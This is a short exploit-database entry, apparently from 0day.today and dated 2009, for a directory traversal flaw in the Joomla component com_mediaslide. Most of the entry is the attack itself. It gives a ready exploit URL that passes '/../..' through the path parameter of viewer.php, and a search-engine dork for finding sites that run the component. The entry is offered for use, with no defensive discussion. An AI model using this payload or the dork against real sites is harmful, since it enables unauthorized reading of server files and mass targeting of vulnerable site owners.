id: 10348
date: 12/21/2009
title: Joomla Component com_mediaslide Directory Traversal Vulnerability
author: Mr.tro0oqy
cves: 

=================================================================
Joomla Component com_mediaslide Directory Traversal Vulnerability
=================================================================

Joomla Component com_mediaslide Directory Traversal Vuln
 
exp :
http://server/components/com_mediaslide/viewer.php?path=/../..
 
dork : inurl:index.php?option=com_mediaslide



#  0day.today [2023-03-26]  #